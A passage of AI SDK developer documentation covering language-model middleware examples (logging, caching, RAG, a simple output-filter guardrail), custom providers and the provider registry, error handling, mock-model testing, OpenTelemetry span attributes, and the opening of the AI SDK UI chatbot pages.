  }),
});

Community Middleware

The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.

Here are some community middlewares that you can explore:

Custom tool call parser

The Custom tool call parser middleware extends tool call capabilities to models that don't natively support the OpenAI-style tools parameter. This includes many self-hosted and third-party models that lack native function calling features.

This middleware enables function calling capabilities by converting function schemas into prompt instructions and parsing the model's responses into structured function calls. It works by transforming the JSON function definitions into natural language instructions the model can understand, then analyzing the generated text to extract function call attempts. This approach allows developers to use the same function calling API across different model providers, even with models that don't natively support the OpenAI-style function calling format, providing a consistent function calling experience regardless of the underlying model implementation.

The @ai-sdk-tool/parser package offers three middleware variants:

createToolMiddleware: A flexible function for creating custom tool call middleware tailored to specific models
hermesToolMiddleware: Ready-to-use middleware for Hermes & Qwen format function calls
gemmaToolMiddleware: Pre-configured middleware for Gemma 3 model series function call format

Here's how you can enable function calls with Gemma models that don't support them natively:

import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';

const model = wrapLanguageModel({
  model: openrouter('google/gemma-3-27b-it'),
  middleware: gemmaToolMiddleware,
});

Find more examples at this link.

Implementing Language Model Middleware

You can implement any of the following three function to modify the behavior of the language model:

transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.

Here are some examples of how to implement language model middleware:

Examples

Logging

This example shows how to log the parameters and generated text of a language model call.

import type {
  LanguageModelV2Middleware,
  LanguageModelV2StreamPart,
} from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV2Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('doGenerate called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const result = await doGenerate();

    console.log('doGenerate finished');
    console.log(`generated text: ${result.text}`);

    return result;
  },

  wrapStream: async ({ doStream, params }) => {
    console.log('doStream called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const { stream, ...rest } = await doStream();

    let generatedText = '';
    const textBlocks = new Map<string, string>();

    const transformStream = new TransformStream<
      LanguageModelV2StreamPart,
      LanguageModelV2StreamPart
    >({
      transform(chunk, controller) {
        switch (chunk.type) {
          case 'text-start': {
            textBlocks.set(chunk.id, '');
            break;
          }
          case 'text-delta': {
            const existing = textBlocks.get(chunk.id) || '';
            textBlocks.set(chunk.id, existing + chunk.delta);
            generatedText += chunk.delta;
            break;
          }
          case 'text-end': {
            console.log(
              `Text block ${chunk.id} completed:`,
              textBlocks.get(chunk.id),
            );
            break;
          }
        }

        controller.enqueue(chunk);
      },

      flush() {
        console.log('doStream finished');
        console.log(`generated text: ${generatedText}`);
      },
    });

    return {
      stream: stream.pipeThrough(transformStream),
      ...rest,
    };
  },
};

Caching

This example shows how to build a simple cache for the generated text of a language model call.

import type { LanguageModelV2Middleware } from '@ai-sdk/provider';

const cache = new Map<string, any>();

export const yourCacheMiddleware: LanguageModelV2Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    const cacheKey = JSON.stringify(params);

    if (cache.has(cacheKey)) {
      return cache.get(cacheKey);
    }

    const result = await doGenerate();

    cache.set(cacheKey, result);

    return result;
  },

  // here you would implement the caching logic for streaming
};

Retrieval Augmented Generation (RAG)

This example shows how to use RAG as middleware.

import type { LanguageModelV2Middleware } from '@ai-sdk/provider';

export const yourRagMiddleware: LanguageModelV2Middleware = {
  transformParams: async ({ params }) => {
    const lastUserMessageText = getLastUserMessageText({
      prompt: params.prompt,
    });

    if (lastUserMessageText == null) {
      return params; // do not use RAG (send unmodified parameters)
    }

    const instruction =
      'Use the following information to answer the question:\n' +
      findSources({ text: lastUserMessageText })
        .map(chunk => JSON.stringify(chunk))
        .join('\n');

    return addToLastUserMessage({ params, text: instruction });
  },
};

Guardrails

Guard rails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.

import type { LanguageModelV2Middleware } from '@ai-sdk/provider';

export const yourGuardrailMiddleware: LanguageModelV2Middleware = {
  wrapGenerate: async ({ doGenerate }) => {
    const { text, ...rest } = await doGenerate();

    // filtering approach, e.g. for PII or other sensitive information:
    const cleanedText = text?.replace(/badword/g, '<REDACTED>');

    return { text: cleanedText, ...rest };
  },

  // here you would implement the guardrail logic for streaming
  // Note: streaming guardrails are difficult to implement, because
  // you do not know the full content of the stream until it's finished.
};

Configuring Per Request Custom Metadata

import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV2Middleware } from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV2Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
    const result = await doGenerate();
    return result;
  },
};

const { text } = await generateText({
  model: wrapLanguageModel({
    model: __MODEL__,
    middleware: yourLogMiddleware,
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    yourLogMiddleware: {
      hello: 'world',
    },
  },
});

console.log(text);

title: Provider & Model Management description: Learn how to work with multiple providers and models

Provider & Model Management

When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.

The AI SDK offers custom providers and a provider registry for this purpose:

With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
The provider registry lets you mix multiple providers and access them through simple string ids.

You can mix and match custom providers, the provider registry, and middleware in your application.

Custom Providers

You can create a custom provider using customProvider.

Example: custom model settings

You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.

import {
  gateway,
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
} from 'ai';

// custom provider with different provider options:
export const openai = customProvider({
  languageModels: {
    // replacement model with custom provider options:
    'gpt-5.1': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    // alias model with custom provider options:
    'gpt-5.1-high-reasoning': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
  },
  fallbackProvider: gateway,
});

Example: model name alias

You can also provide model name aliases, so you can update the model version in one place in the future:

import { customProvider, gateway } from 'ai';

// custom provider with alias names:
export const anthropic = customProvider({
  languageModels: {
    opus: gateway('anthropic/claude-opus-4.1'),
    sonnet: gateway('anthropic/claude-sonnet-4.5'),
    haiku: gateway('anthropic/claude-haiku-4.5'),
  },
  fallbackProvider: gateway,
});

Example: limit available models

You can limit the available models in the system, even if you have multiple providers.

import {
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
  gateway,
} from 'ai';

export const myProvider = customProvider({
  languageModels: {
    'text-medium': gateway('anthropic/claude-sonnet-4.5'),
    'text-small': gateway('openai/gpt-5-mini'),
    'reasoning-medium': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    'reasoning-fast': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'low',
            },
          },
        },
      }),
    }),
  },
  embeddingModels: {
    embedding: gateway.textEmbeddingModel('openai/text-embedding-3-small'),
  },
  // no fallback provider
});

Provider Registry

You can create a provider registry with multiple providers and models using createProviderRegistry.

Setup

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const registry = createProviderRegistry({
  // register provider with prefix and default setup using gateway:
  gateway,

  // register provider with prefix and direct provider import:
  anthropic,
  openai,
});

Setup with Custom Separator

By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const customSeparatorRegistry = createProviderRegistry(
  {
    gateway,
    anthropic,
    openai,
  },
  { separator: ' > ' },
);

Example: Use language models

You can access language models by using the languageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateText } from 'ai';
import { registry } from './registry';

const { text } = await generateText({
  model: registry.languageModel('openai:gpt-5.1'), // default separator
  // or with custom separator:
  // model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Example: Use text embedding models

You can access text embedding models by using the textEmbeddingModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { embed } from 'ai';
import { registry } from './registry';

const { embedding } = await embed({
  model: registry.textEmbeddingModel('openai:text-embedding-3-small'),
  value: 'sunny day at the beach',
});

Example: Use image models

You can access image models by using the imageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateImage } from 'ai';
import { registry } from './registry';

const { image } = await generateImage({
  model: registry.imageModel('openai:dall-e-3'),
  prompt: 'A beautiful sunset over a calm ocean',
});

Combining Custom Providers, Provider Registry, and Middleware

Here is an example that implements the following concepts:

pass through gateway with a namespace prefix (here: gateway > *)
pass through a full provider with a namespace prefix (here: xai > *)
setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
pre-configure model settings (here: anthropic > reasoning)
validate the provider-specific options (here: AnthropicProviderOptions)
use a fallback provider (here: anthropic > *)
limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
define a custom separator for the provider registry (here: >)

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
  createProviderRegistry,
  customProvider,
  defaultSettingsMiddleware,
  gateway,
  wrapLanguageModel,
} from 'ai';

export const registry = createProviderRegistry(
  {
    // pass through gateway with a namespace prefix
    gateway,

    // pass through full providers with namespace prefixes
    xai,

    // access an OpenAI-compatible provider with custom setup
    custom: createOpenAICompatible({
      name: 'provider-name',
      apiKey: process.env.CUSTOM_API_KEY,
      baseURL: 'https://api.custom.com/v1',
    }),

    // setup model name aliases
    anthropic: customProvider({
      languageModels: {
        fast: anthropic('claude-haiku-4-5'),

        // simple model
        writing: anthropic('claude-sonnet-4-5'),

        // extended reasoning model configuration:
        reasoning: wrapLanguageModel({
          model: anthropic('claude-sonnet-4-5'),
          middleware: defaultSettingsMiddleware({
            settings: {
              maxOutputTokens: 100000, // example default setting
              providerOptions: {
                anthropic: {
                  thinking: {
                    type: 'enabled',
                    budgetTokens: 32000,
                  },
                } satisfies AnthropicProviderOptions,
              },
            },
          }),
        }),
      },
      fallbackProvider: anthropic,
    }),

    // limit a provider to certain models without a fallback
    groq: customProvider({
      languageModels: {
        'gemma2-9b-it': groq('gemma2-9b-it'),
        'qwen-qwq-32b': groq('qwen-qwq-32b'),
      },
    }),
  },
  { separator: ' > ' },
);

// usage:
const model = registry.languageModel('anthropic > reasoning');

Global Provider Configuration

The AI SDK 5 includes a global provider feature that allows you to specify a model using just a plain model ID string:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = await streamText({
  model: __MODEL__, // Uses the global provider (defaults to gateway)
  prompt: 'Invent a new holiday and describe its traditions.',
});

By default, the global provider is set to the Vercel AI Gateway.

Customizing the Global Provider

You can set your own preferred global provider:

import { openai } from '@ai-sdk/openai';

// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;

import { streamText } from 'ai';

const result = await streamText({
  model: 'gpt-5.1', // Uses OpenAI provider without prefix
  prompt: 'Invent a new holiday and describe its traditions.',
});

This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.

title: Error Handling description: Learn how to handle errors in the AI SDK Core

Error Handling

Handling regular errors

Regular errors are thrown and can be handled using the try/catch block.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { text } = await generateText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });
} catch (error) {
  // handle error
}

See Error Types for more information on the different types of errors that may be thrown.

Handling streaming errors (simple streams)

When errors occur during streams that do not support error chunks, the error is thrown as a regular error. You can handle these errors using the try/catch block.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { textStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const textPart of textStream) {
    process.stdout.write(textPart);
  }
} catch (error) {
  // handle error
}

Handling streaming errors (streaming with `error` support)

Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of the streaming.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { fullStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const part of fullStream) {
    switch (part.type) {
      // ... handle other part types

      case 'error': {
        const error = part.error;
        // handle error
        break;
      }

      case 'abort': {
        // handle stream abort
        break;
      }

      case 'tool-error': {
        const error = part.error;
        // handle error
        break;
      }
    }
  }
} catch (error) {
  // handle error
}

Handling stream aborts

When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.

The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { textStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  onAbort: ({ steps }) => {
    // Update stored messages or perform cleanup
    console.log('Stream aborted after', steps.length, 'steps');
  },
  onFinish: ({ steps, totalUsage }) => {
    // This is called on normal completion
    console.log('Stream completed normally');
  },
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

The onAbort callback receives:

steps: An array of all completed steps before the abort

You can also handle abort events directly in the stream:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { fullStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

for await (const chunk of fullStream) {
  switch (chunk.type) {
    case 'abort': {
      // Handle abort directly in stream
      console.log('Stream was aborted');
      break;
    }
    // ... handle other part types
  }
}

title: Testing description: Learn how to use AI SDK Core mock providers for testing.

Testing

Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.

To enable you to unit test your code that uses the AI SDK, the AI SDK Core includes mock providers and test helpers. You can import the following helpers from ai/test:

MockEmbeddingModelV2: A mock embedding model using the embedding model v2 specification.
MockLanguageModelV2: A mock language model using the language model v2 specification.
mockId: Provides an incrementing integer ID.
mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
simulateReadableStream: Simulates a readable stream with delays.

With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.

Examples

You can use the test helpers with the AI Core functions in your unit tests:

generateText

import { generateText } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';

const result = await generateText({
  model: new MockLanguageModelV2({
    doGenerate: async () => ({
      finishReason: 'stop',
      usage: { inputTokens: 10, outputTokens: 20, totalTokens: 30 },
      content: [{ type: 'text', text: `Hello, world!` }],
      warnings: [],
    }),
  }),
  prompt: 'Hello, test!',
});

streamText

import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';

const result = streamText({
  model: new MockLanguageModelV2({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: 'Hello' },
          { type: 'text-delta', id: 'text-1', delta: ', ' },
          { type: 'text-delta', id: 'text-1', delta: 'world!' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: { inputTokens: 3, outputTokens: 10, totalTokens: 13 },
          },
        ],
      }),
    }),
  }),
  prompt: 'Hello, test!',
});

generateObject

import { generateObject } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
import { z } from 'zod';

const result = await generateObject({
  model: new MockLanguageModelV2({
    doGenerate: async () => ({
      finishReason: 'stop',
      usage: { inputTokens: 10, outputTokens: 20, totalTokens: 30 },
      content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
      warnings: [],
    }),
  }),
  schema: z.object({ content: z.string() }),
  prompt: 'Hello, test!',
});

streamObject

import { streamObject, simulateReadableStream } from 'ai';
import { MockLanguageModelV2 } from 'ai/test';
import { z } from 'zod';

const result = streamObject({
  model: new MockLanguageModelV2({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: '{ ' },
          { type: 'text-delta', id: 'text-1', delta: '"content": ' },
          { type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
          { type: 'text-delta', id: 'text-1', delta: `world` },
          { type: 'text-delta', id: 'text-1', delta: `!"` },
          { type: 'text-delta', id: 'text-1', delta: ' }' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: { inputTokens: 3, outputTokens: 10, totalTokens: 13 },
          },
        ],
      }),
    }),
  }),
  schema: z.object({ content: z.string() }),
  prompt: 'Hello, test!',
});

Simulate UI Message Stream Responses

You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.

Here is a Next example:

import { simulateReadableStream } from 'ai';

export async function POST(req: Request) {
  return new Response(
    simulateReadableStream({
      initialDelayInMs: 1000, // Delay before the first chunk
      chunkDelayInMs: 300, // Delay between chunks
      chunks: [
        `data: {"type":"start","messageId":"msg-123"}\n\n`,
        `data: {"type":"text-start","id":"text-1"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
        `data: {"type":"text-end","id":"text-1"}\n\n`,
        `data: {"type":"finish"}\n\n`,
        `data: [DONE]\n\n`,
      ],
    }).pipeThrough(new TextEncoderStream()),
    {
      status: 200,
      headers: {
        'Content-Type': 'text/event-stream',
        'Cache-Control': 'no-cache',
        Connection: 'keep-alive',
        'x-vercel-ai-ui-message-stream': 'v1',
      },
    },
  );
}

title: Telemetry description: Using OpenTelemetry with AI SDK Core

Telemetry

The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.

Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.

Enabling telemetry

For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.

You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: { isEnabled: true },
});

Telemetry Metadata

You can provide a functionId to identify the function that the telemetry data is for, and metadata to include additional information in the telemetry data.

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    functionId: 'my-awesome-function',
    metadata: {
      something: 'custom',
      someOtherThing: 'other-value',
    },
  },
});

Custom Tracer

const tracerProvider = new NodeTracerProvider();
const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    tracer: tracerProvider.getTracer('ai'),
  },
});

Collected Data

generateText function

generateText records 3 types of spans:

ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.generateText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText"
- ai.prompt: the prompt that was used when calling generateText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText.doGenerate"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.

streamText function

streamText records 3 types of spans and 2 types of events:

ai.streamText (span): the full length of the streamText call. It contains a ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText"
- ai.prompt: the prompt that was used when calling streamText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText.doStream"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
- ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
- ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk
ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.

It also records a ai.stream.firstChunk event when the first chunk of the stream is received.

generateObject function

generateObject records 2 types of spans:

ai.generateObject (span): the full length of the generateObject call. It contains 1 or more ai.generateObject.doGenerate spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.generateObject and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateObject"
- ai.prompt: the prompt that was used when calling generateObject
- ai.schema: Stringified JSON schema version of the schema that was passed into the generateObject function
- ai.schema.name: the name of the schema that was passed into the generateObject function
- ai.schema.description: the description of the schema that was passed into the generateObject function
- ai.response.object: the object that was generated (stringified JSON)
- ai.settings.output: the output type that was used, e.g. object or no-schema
ai.generateObject.doGenerate (span): a provider doGenerate call. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateObject.doGenerate and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateObject.doGenerate"
- ai.prompt.messages: the messages that were passed into the provider
- ai.response.object: the object that was generated (stringified JSON)
- ai.response.finishReason: the reason why the generation finished

streamObject function

streamObject records 2 types of spans and 1 type of event:

ai.streamObject (span): the full length of the streamObject call. It contains 1 or more ai.streamObject.doStream spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamObject and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamObject"
- ai.prompt: the prompt that was used when calling streamObject
- ai.schema: Stringified JSON schema version of the schema that was passed into the streamObject function
- ai.schema.name: the name of the schema that was passed into the streamObject function
- ai.schema.description: the description of the schema that was passed into the streamObject function
- ai.response.object: the object that was generated (stringified JSON)
- ai.settings.output: the output type that was used, e.g. object or no-schema
ai.streamObject.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamObject.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamObject.doStream"
- ai.prompt.messages: the messages that were passed into the provider
- ai.response.object: the object that was generated (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk
- ai.response.finishReason: the reason why the generation finished
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk

embed function

embed records 2 types of spans:

ai.embed (span): the full length of the embed call. It contains 1 ai.embed.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed"
- ai.value: the value that was passed into the embed function
- ai.embedding: a JSON-stringified embedding
ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed.doEmbed"
- ai.values: the values that were passed into the provider (array)
- ai.embeddings: an array of JSON-stringified embeddings

embedMany function

embedMany records 2 types of spans:

ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany"
- ai.values: the values that were passed into the embedMany function
- ai.embeddings: an array of JSON-stringified embedding
ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany.doEmbed"
- ai.values: the values that were sent to the provider
- ai.embeddings: an array of JSON-stringified embeddings for each value

Span Details

Basic LLM span information

resource.name: the functionId that was set through telemetry.functionId
ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.response.providerMetadata: provider specific metadata returned with the generation response
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.completionTokens: the number of completion tokens that were used
ai.usage.promptTokens: the number of prompt tokens that were used

Call LLM span information

ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
ai.response.id: the id of the response. Uses the ID from the provider when available.
ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
Semantic Conventions for GenAI operations
- gen_ai.system: the provider that was used
- gen_ai.request.model: the model that was requested
- gen_ai.request.temperature: the temperature that was set
- gen_ai.request.max_tokens: the maximum number of tokens that were set
- gen_ai.request.frequency_penalty: the frequency penalty that was set
- gen_ai.request.presence_penalty: the presence penalty that was set
- gen_ai.request.top_k: the topK parameter value that was set
- gen_ai.request.top_p: the topP parameter value that was set
- gen_ai.request.stop_sequences: the stop sequences
- gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
- gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
- gen_ai.usage.input_tokens: the number of prompt tokens that were used
- gen_ai.usage.output_tokens: the number of completion tokens that were used

Basic embedding span information

Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:

ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.tokens: the number of tokens that were used
resource.name: the functionId that was set through telemetry.functionId

Tool call spans

Tool call spans (ai.toolCall) contain the following attributes:

operation.name: "ai.toolCall"
ai.operationId: "ai.toolCall"
ai.toolCall.name: the name of the tool
ai.toolCall.id: the id of the tool call
ai.toolCall.args: the input parameters of the tool call
ai.toolCall.result: the output result of the tool call. Only available if the tool call is successful and the result is serializable.

title: Overview description: An overview of AI SDK UI.

AI SDK UI

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.

These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.

UI Framework Support

AI SDK UI supports the following frameworks: React, Svelte, Vue.js, and Angular. Here is a comparison of the supported functions across these frameworks:

Function	Svelte	Angular
useChat	Chat	Chat
useCompletion	Completion	Completion
useObject	StructuredObject	StructuredObject

Framework Examples

Explore these example implementations for different frameworks:

API Reference

Please check out the AI SDK UI API Reference for more details on each function.

title: Chatbot description: Learn how to use the useChat hook.

Chatbot

To summarize, the useChat hook provides the following features:

Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
Managed States: The hook manages the states for input, messages, status, error and more for you.
Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.

Example

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat({
    transport: new DefaultChatTransport({
